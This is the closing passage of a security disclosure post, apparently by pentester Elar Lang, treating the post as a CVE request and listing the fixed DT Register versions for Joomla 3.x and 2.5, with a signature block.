As I haven't got any feedback, you can take this post as CVE request.
# Fix
DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5).
--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com